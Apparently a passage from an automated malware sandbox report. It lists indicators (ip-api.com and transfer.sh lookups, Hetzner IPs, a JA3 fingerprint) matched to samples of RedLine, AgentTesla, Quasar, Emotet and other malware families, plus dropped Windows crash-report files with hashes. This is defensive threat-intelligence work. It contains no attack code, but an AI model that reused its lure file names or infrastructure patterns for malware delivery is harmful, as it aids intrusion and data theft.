	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	ip-api.com/json
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	ip-api.com/csv/?fields=status,query
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	ip-api.com/json
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	ip-api.com/csv/?fields=status,query
	bKJ7.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	bKJA.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	ip-api.com/json
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	ip-api.com/line?fields=query
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	ip-api.com/line/?fields=hosting
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	1HYkac8PAl.apk	Get hash	malicious	Unknown	Browse	ip-api.com/json
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	ip-api.com/json/
	Service.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	ip-api.com//json/
	bKDP.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	prkHVeo4Bi.elf	Get hash	malicious	Unknown	Browse	208.95.112.1
	Scan005.js	Get hash	malicious	MailPassView, WSHRAT	Browse	208.95.112.1
	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	208.95.112.1
	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	208.95.112.1
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	bKJ7.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	bKJA.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	208.95.112.1
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	208.95.112.1
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	208.95.112.1
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	208.95.112.1
	Service.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	208.95.112.1
	bKDP.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	contact_me.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
transfer.sh	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	144.76.136.153
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	144.76.136.153
	information_21_mar-7065132.js	Get hash	malicious	NetSupport RAT	Browse	144.76.136.153
	information_21_mar-7065132.js	Get hash	malicious	NetSupport RAT	Browse	144.76.136.153
	information_20_mar.js	Get hash	malicious	NetSupport RAT	Browse	144.76.136.153
	information_20_mar.js	Get hash	malicious	NetSupport RAT	Browse	144.76.136.153
	7rSoC1BfML.exe	Get hash	malicious	Amadey, Nymaim, RedLine, SmokeLoader, Stealc, Vidar	Browse	144.76.136.153
	TELEX_RELEASE_BL_+COO.exe	Get hash	malicious	Remcos	Browse	144.76.136.153
	setup.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	it2NFpv2yt.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	file.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	mTt6kKGxhD.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	SecuriteInfo.com.Win32.Evo-gen.15663.2709.exe	Get hash	malicious	SmokeLoader	Browse	144.76.136.153
	07SSxShbLe.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	144.76.136.153
	2WVeLGu1i7.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	144.76.136.153
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	144.76.136.153
	Lu4tTvHBn7.exe	Get hash	malicious	Unknown	Browse	144.76.136.153
	LauncherSoft.exe	Get hash	malicious	Laplas Clipper, Raccoon Stealer v2	Browse	144.76.136.153
	oQbo4hsx5P.exe	Get hash	malicious	RedLine	Browse	144.76.136.153

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	Quote_#8039651.exe	Get hash	malicious	AgentTesla	Browse	46.4.214.202
	Order_4039740410170.exe	Get hash	malicious	AgentTesla	Browse	46.4.214.202
	Temporibus.html	Get hash	malicious	Qbot	Browse	94.130.34.27
	Temporibus.html	Get hash	malicious	Unknown	Browse	94.130.34.27
	Server.exe	Get hash	malicious	Mimikatz, Sality	Browse	78.46.2.155
	l5dFbb5Tih.exe	Get hash	malicious	njRat	Browse	159.69.153.93
	Invoice n BU926903 03.23.one	Get hash	malicious	Emotet	Browse	95.217.221.146
	HED-010323_NZJF-230323.one	Get hash	malicious	Emotet	Browse	95.217.221.146
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	95.217.221.146
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	95.217.221.146
	pxwIQ33MRH.dll.11.dll	Get hash	malicious	Emotet	Browse	95.217.221.146
	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	144.76.136.153
	putin1337-202384344125.exe	Get hash	malicious	Unknown	Browse	195.201.57.90
	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	95.217.112.242
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	195.201.45.203
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	195.201.45.203
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	195.201.45.203
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	195.201.45.203
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	195.201.45.203
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	195.201.45.203
TUT-ASUS	prkHVeo4Bi.elf	Get hash	malicious	Unknown	Browse	208.95.112.1
	Scan005.js	Get hash	malicious	MailPassView, WSHRAT	Browse	208.95.112.1
	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	208.95.112.1
	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	208.95.112.1
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	bKJ7.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	bKJA.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	glzfNGT2uK.exe	Get hash	malicious	ManusCrypt, Nitol	Browse	208.95.112.1
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	208.95.112.1
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	208.95.112.1
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	208.95.112.1
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	1HYkac8PAl.apk	Get hash	malicious	Unknown	Browse	208.95.112.1
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	208.95.112.1
	Service.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	FACT641d8.msi	Get hash	malicious	Unknown	Browse	144.76.136.153
	peenge.dll	Get hash	malicious	Qbot	Browse	144.76.136.153
	file.exe	Get hash	malicious	PrivateLoader	Browse	144.76.136.153
	file.exe	Get hash	malicious	PrivateLoader	Browse	144.76.136.153
	neoplasmsFormazan.dll	Get hash	malicious	Qbot	Browse	144.76.136.153
	QUOTATION__RFQ#_1043999.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	144.76.136.153
	file.exe	Get hash	malicious	Amadey, Djvu, LummaC Stealer, SmokeLoader	Browse	144.76.136.153
	FACT641d5.msi	Get hash	malicious	Unknown	Browse	144.76.136.153
	TR_ORDER.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	144.76.136.153
	Bloomberg_BNA.docx.doc	Get hash	malicious	Unknown	Browse	144.76.136.153
	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Djvu	Browse	144.76.136.153

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\re.exe	1JCAVkYU3U.exe	Get hash	malicious	RedLine	Browse
C:\Users\user\AppData\Local\Temp\re.exe	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_123.exe_32f05459eb6f24c8a3f7dd7195e458f491582729_7037eb10_140f9119\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6729595109227865
Encrypted:	false
SSDEEP:	96:pUAq/UstFOReOlhloI7Rj6tpXIQcQvc6QcEDMcw3DSuH+HbHg/uAnQ0DmZAXGngG:pKFLFHBUZMXQjW/u7sl/S274Itj
MD5:	592947AB320DC9545D82A2E075CB02F0
SHA1:	3E1A3779CA47D31A392579738FFFF85B1B47E79D
SHA-256:	3E4416588176183D6D56E54659FD1262576DDC36C7DF9D30A12EED15AAE71F4F
SHA-512:	BF8BFDFD4450DDA06B85482525A1ABA1FDDD53E5280F0DD72EE862DB2FA9BD5951B758F7608F9C6F683665D32E0EF4D267F79E01D3E4BFDB36F5E2CD22D752BC
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.0.9.4.9.2.6.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.1.7.9.3.0.1.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.8.5.2.4.2.c.-.3.5.a.1.-.4.5.f.b.-.9.4.8.1.-.a.c.9.4.d.3.c.b.0.b.b.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.c.9.a.4.f.6.-.d.0.4.1.-.4.8.6.b.-.9.4.e.a.-.e.3.a.2.0.1.b.2.f.f.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.3.4.-.0.0.0.1.-.0.0.1.f.-.3.9.e.b.-.5.7.0.c.a.0.5.e.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.d.3.e.2.7.1.9.9.5.5.5.5.1.e.e.6.3.a.f.a.0.3.a.3.5.a.7.9.a.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.2.c.a.c.4.e.f.5.1.2.9.6.e.c.4.5.9.a.1.4.9.d.a.3.d.1.e.0.f.e.d.f.6.6.2.c.7.f.2.!.1.2.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.2.4.:.1.1.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_321.exe_69257ad151fe39f2e7833811d7794a2b82d361d_091ec038_19a39139\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6728398931147754
Encrypted:	false
SSDEEP:	96:pUM/UJuFhT1MoSj8FhwoI7Rj6tpXIQcQvc6QcEDMcw3DSOn+HbHg/uAnQ0DmZAXv:p3N31ejiHBUZMXQjW/u7sl/S274ItjK
MD5:	B10633E5F667D7A92195E2E763D76751
SHA1:	BE6A1E36A99A809E666E7EF1EF61BE37D7E23206
SHA-256:	2F77A21BFEBABF214D613B394470B294C7AB0D1411A7623AFAE054DC947116E0
SHA-512:	8AF91788F9128BA2C4618D7821D72EF8EB018FFD2C769725D9CB8D6AEBA5F1F1245C9371F734A940E6A873A4027ED5339BC08F588D997E99C3B9D362483AEB5A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.2.6.1.1.1.5.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.3.3.6.1.1.4.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.4.2.d.c.9.9.-.6.8.c.8.-.4.4.9.e.-.b.a.c.2.-.0.4.f.f.5.1.e.c.b.f.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.2.8.d.e.4.f.-.a.7.b.0.-.4.7.2.b.-.a.b.2.e.-.9.e.0.9.d.d.d.1.f.e.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.2.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.c.0.-.0.0.0.1.-.0.0.1.f.-.e.0.8.1.-.7.4.0.c.a.0.5.e.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.c.8.2.c.d.2.e.6.6.8.c.1.d.4.3.c.4.d.2.6.c.4.9.6.c.e.7.1.5.2.0.0.0.0.f.f.f.f.!.0.0.0.0.2.6.d.d.4.7.7.2.0.0.6.f.7.0.d.1.1.8.3.4.2.2.0.3.f.0.e.7.1.8.d.2.7.0.1.8.0.7.4.3.!.3.2.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.2.4.:.1.1.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_bd9581c2744d4f52fbb07295eae52cccbbca52_85207d7d_143b90ac\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.5742616409498275
Encrypted:	false
SSDEEP:	96:iUk/UNFV4KrAQhMod7JYJpXIQcQqc6mcEKcw34enZAXGng5FMTPSkvPkpXmTA/Sf:ivc//rIHkigMP/u7sl/S274ItQ
MD5:	2BEBA2498F9C8DBA92B83637C19D4660
SHA1:	5E4EE1C842F260451D2A2D5A6E12F69E7E9AF4BC
SHA-256:	A7B79384C8940FA6A891809ED06F66A43FC6E780FB541A475821477B6A9C2275
SHA-512:	A8D0C781EF65FB40B852EA2A12CE490026D408540ECC0BE78AEFC462C1687C848C8076413F1D93069D7EF19EF4957F04159B3915B456FFE843027C6A96DE61A3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.0.6.7.5.3.8.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.1.7.0.5.5.5.0.1.9.1.3.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.7.2.e.d.f.b.-.0.f.9.c.-.4.e.1.1.-.9.d.7.f.-.6.b.1.e.6.b.0.d.7.d.6.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.f.b.5.f.5.9.-.f.4.b.b.-.4.3.e.e.-.9.7.4.9.-.4.6.5.a.b.7.5.f.c.6.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.9.8.-.0.0.0.1.-.0.0.1.f.-.6.1.d.5.-.b.6.0.c.a.0.5.e.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.7.b.a.2.a.1.1.1.c.e.d.d.5.b.f.5.2.3.2.2.4.b.3.f.1.c.f.e.5.8.e.e.c.7.c.2.f.d.c.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5818.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 24 22:29:11 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	39388
Entropy (8bit):	1.859869902046322
Encrypted:	false
SSDEEP:	96:5p8lB8M/dPvE2J+qmi768aEkkPOQ/L+e5TGzIF0T58SIMcNihBe3WInWIH4Ib76k:Eldt864O6xQfT7SIMiD7nONy7
MD5:	87EF6F82E68F57AC52AB8FEE7EAD4B32
SHA1:	4D191DC8947CCD2BD5BCC5D7E7A330F67A67CBE8
SHA-256:	873CD931E566A9EDDAF9ED788F77960EC2074FB941F0F7CBB481E2F2507C308F
SHA-512:	8C4819F99CDC50DF3B35E81266B5096423FF59EDAACB1E49EF64B4E43F36D3DD5189AE69407C0A87EF30AEAE16645B8016E6586FA7EB174986048D6FA17C4317
Malicious:	false
Preview:	MDMP....... .......7$.d....................................................T.......8...........T...........................................................................................................U...........B......4.......GenuineIntelW...........T.......4...3$.d.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER59DE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.694671596597277
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNizb6pRN6YtCm6mRgmf4SmCprk89bPYsf3Fm:RrlsNiv6pRN6Yx6mRgmf4SvPLfY
MD5:	1B52D0652A073D292C1B99FF28E06BC7
SHA1:	2DDEC516C4E1D9A54CA83731074039B9653705E4
SHA-256:	E6D59C103753B1C1A1E05F8F7F7EF0E802ADDCD6C307F0FB49F166BCD9A83887
SHA-512:	1D27EB9D3175E5F89E6DCB4D743F9A624510EA66E7E2169110BDC4970BD3A6B7070CF76259AF00B853F176FA763385EF9A25DD8E31D0806DFD076121EA5CECD6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A6B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	4.451805923302419
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI9htWgc8sqYjV8fm8M4J0GMFPtLq+q8vzGuQ5hp02d:uITflGcgrsqYOJXpKqr7p02d
MD5:	878AFB7B609752D80A41927ACD341D86
SHA1:	68B66A3192BD159A4C7D95CAEA5F703C52F547D0
SHA-256:	D4F5AC85FB886F2D3E397AB48B6BFFFBE28148EA7031624A3DE21D8458CEF9D8
SHA-512:	4D35D378ED06EB72BDD871AA4B42140333549E1420635AD41AB6C0024D3983237CB3BA49B6FA44CEFAF79B2EC3BB89B69075EAD5F35D4466F1C146DF64226B90
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1967499" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 24 22:29:12 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	40304
Entropy (8bit):	1.8226302390646563
Encrypted:	false
SSDEEP:	96:528U8M/AJ07hi768MYTTzPHHP8qSJpASAIWmWInWIXwIPo0om/gBvAZGO:b8AG7hO6gSJ6/0o06BvCGO
MD5:	F2F445901D7840298FE98DF6823A4C12
SHA1:	D399FB07DB61169C6335CE75E13524AEF5F3F4B6
SHA-256:	C56F942F3ADD1AA3010F58DBAE0AC01537FB90B9D351DA109062D757C9E291E0
SHA-512:	ABEE5E2BABC5F730E994429C3A86CCCC6264C2971C44AD654C68D93ACA2DB551023A3FEE926E485F068E7F8ED0B77E05112BAB83A618D0B27B9D0A0DF3B31766
Malicious:	false
Preview:	MDMP....... .......8$.d....................................................T.......8...........T...............`............................................................................................U...........B......4.......GenuineIntelW...........T...........4$.d.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FF8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6342
Entropy (8bit):	3.7189543222159096
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi8D6RY/SmCpr/89bdksfEffm:RrlsNiY6RY/SudXfE2
MD5:	8473C291ABC93939F19905C6B05785C8
SHA1:	2F947A34D38DF7B0C9628A85B82D54D56564A2DC
SHA-256:	5DC20188E7BE19CB99D9C99748ED2BF6CA6DF089B661A4D0EBE59E631DE7BB18
SHA-512:	E391F2FC350946D7D0406149E76A847B8172B2484D81F2937E4780D9A75DCE5C3E813ACCC9CC1A85F2F95ED36F5A2F07B49914D818EA2960FC76E12353993D46
Malicious:	false
